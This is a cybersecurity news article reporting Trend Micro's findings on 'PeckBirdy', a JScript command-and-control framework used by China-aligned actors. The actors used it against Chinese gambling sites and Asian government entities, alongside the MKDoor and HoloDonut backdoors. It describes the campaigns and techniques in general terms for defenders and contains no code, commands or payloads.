China-Backed 'PeckBirdy' Takes Flight for Cross-Platform Attacks - Dark Reading

Threat IntelligenceVulnerabilities & ThreatsEndpoint SecurityCyberattacks & Data BreachesNewsChina-Backed 'PeckBirdy' Takes Flight for Cross-Platform AttacksIn two separate campaigns, attackers used the JScript C2 framework to target Chinese gambling websites and Asian government entities with new backdoors.Elizabeth Montalbano,Contributing WriterJanuary 28, 20264 Min ReadSource: BeeBright via ShutterstockChina-aligned threat actors have been using a cross-platform, multifunction JScript framework to conduct cyber-espionage attacks for the past several years, augmenting their activities with modular backdoors in two separate campaigns targeting gambling sites and government entities.Researchers at Trend Micro have been tracking the use of the framework, dubbed "PeckBirdy," since 2023, according to a blog post this week. The command-and-control (C2) framework, written in Microsoft's JScript legacy language, is aimed at flexible deployment by enabling execution across multiple environments.The use of such a C2 framework gives attackers an advantage against defenders, as "detecting malicious JavaScript frameworks remains a significant challenge due to their use of dynamically generated, runtime-injected code and the absence of persistent file artifacts," Trend Micro threat researchers Ted Lee and Joseph C. Chen wrote in the post. This, in turn, enables them to evade traditional endpoint security controls, they said.Related:From Stuxnet to ChatGPT: 20 News Events That Shaped CyberPeckBirdy allows attackers to abuse living-off-the-land (LOTL) binaries (LOLBins) to execute malicious activities across different execution environments rather than being confined to one platform. Attackers also demonstrated the use of two newly discovered modular backdoors — which researchers name "MKDoor" and "HoloDonut" — to bolster the native functionality of PeckBirdy and conduct cyber-espionage, the researchers said.Two Separate Campaigns Wielding PeckBirdySpecifically, TrendMicro uncovered two separate campaigns, tracked as Shadow-Void-044 and Shadow-Earth-045, using PeckBirdy across multiple attack vectors, which the researchers believe are the work of different China-aligned actors.The former campaign, which began in 2023, targeted Chinese gambling websites with malicious scripts and links to remote servers that allow actors to use PeckBirdy to deliver and execute JScript code to visitors of the sites. "The primary goal of this routine is to display fake software update web pages for Google Chrome to entice victims into downloading and executing malicious update files, which are backdoors prepared by the attackers," the researchers wrote. One of the backdoors used in the campaign is the MKDoor, a previously undocumented malware.Attackers in the Shadow-Void campaign also used stolen code-signing certificates, Cobalt Strike payloads, and exploits — including a Google Chrome RCE flaw tracked as CVE-2020-16040 — hosted across multiple C2 domains and IP addresses to maintain persistent access.Related:Exploit Cyber-Frenzy Threatens Millions via Critical cPanel VulnerabilityLink to China's Earth Baxia? The Shadow-Earth campaign, discovered in July 2024, targeted Asian government entities by injecting PeckBirdy links into government websites to deliver scripts for credential harvesting."In one case, the injection was on a login page of a government's system, while in another incident, we noticed the attacker using MSHTA to execute PeckBirdy as a remote access channel for lateral movement in a private organization," the researchers wrote.This activity, which targeted a Philippine educational institution in July 2024, also downloaded files from an IP address previously linked to Chinese threat actor Earth Baxia, though evidence supporting the group's involvement is weak for now, according to Trend Micro.The Shadow-Earth attackers wielded the previously identified GrayRabbit backdoor as well as the HoloDonut backdoor in their activities. GrayRabbit has been used by a threat group tracked as China-backed UNC3569, while HoloDonut had not been detected before but is likely linked to another backdoor, WizardNet, used by a APT similarly named TheWizard, the researchers noted.The threat actor behind the government attacks also developed a .NET executable to launch PeckBirdy with ScriptControl, further demonstrating "the versatility of PeckBirdy’s design, which enables it to serve multiple purposes," they wrote.Related:Vect 2.0 Ransomware Acts as Wiper, Thanks to Design ErrorDefensive Monitoring NecessaryIt's unclear which threat actors are using PeckBirdy in these campaigns, but Trend Micro says they are likely aligned with Chinese state-sponsored threat activity, in which numerous APTs are consistently conducting cyber-espionage activities against select targets across the globe.In such a threat environment, "adaptability and continuous refinement of defensive strategies are no longer optional, but fundamental to maintaining operational integrity" as defenders continue to ward off persistent hostile threats, the researchers noted. One tactic integral to organizations' defense plans should be continuous monitoring of infrastructure so they can block any intrusive activities before attackers can gain a persistent foothold.To that end, Trend Micro included links to previous reports about the potential threat actors behind the campaign so defenders can educate themselves on their tools, tactics, and procedures (TTPs), as well as hunting queries and indicators of compromise (IOCs) that organizations can employ in their security activities to detect potential use of PeckBirdy.About the AuthorElizabeth MontalbanoContributing WriterElizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.See more from Elizabeth MontalbanoWant more Dark Reading stories in your Google search results?Add Us NowMore InsightsIndustry ReportsHow Enterprises Are Developing Secure ApplicationsInside RSAC 2026: security leaders reveal the risks redefining your defense strategyHow Enterprises Are Harnessing Emerging Technologies in CybersecurityDitch the Data Center: Understanding Flexible Cloud Infrastructure Security Management2025 State of MalwareAccess More ResearchWebinarsThe New Attack Surface: How Attackers Are Exploiting OAuth to Own Your Cloud WorkspacePrompt Injection Is Just the Start: Securing LLMs in AI SystemsAnatomy of a Data Breach: What to Do if it Happens to YouHow Well Can You See What's in Your Cloud?Implementing CTEM: Beyond Vulnerability ManagementMore WebinarsEditor's ChoiceThreat IntelligenceFrom Stuxnet to ChatGPT: 20 News Events That Shaped CyberFrom Stuxnet to ChatGPT: 20 News Events That Shaped CyberbyDark Reading Editorial TeamMay 6, 202631 Min ReadCyber RiskPhysical Cargo Theft Gets a Boost From CybercriminalsPhysical Cargo Theft Gets a Boost From CybercriminalsbyRobert LemosMay 4, 20265 Min ReadWant more Dark Reading stories in your Google search results?Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.SubscribeWebinarsThe New Attack Surface: How Attackers Are Exploiting OAuth to Own Your Cloud WorkspaceWed, June 24,2026 at 1pm ESTPrompt Injection Is Just the Start: Securing LLMs in AI SystemsTues, May 26, 2026, at 1pm ESTAnatomy of a Data Breach: What to Do if it Happens to YouJune 18th, 2026 | 11:00am -5:00pm ET | Doors Open at 10:30am ETHow Well Can You See What's in Your Cloud?Thurs, June 4, 2026 at 1:00pm ESTImplementing CTEM: Beyond Vulnerability ManagementThurs, May 21, 2026 at 1pm ESTMore WebinarsBlack Hat USA | Mandalay Bay, Las VegasThe premier cybersecurity event of the year returns to Mandalay Bay with a re‑engineered, six‑day program built to ignite innovation, push boundaries, and bring the global security community together like never before. Use code: DARKREADING to save $200 on a Briefings pass or $100 on a Business pass.GET YOUR PASS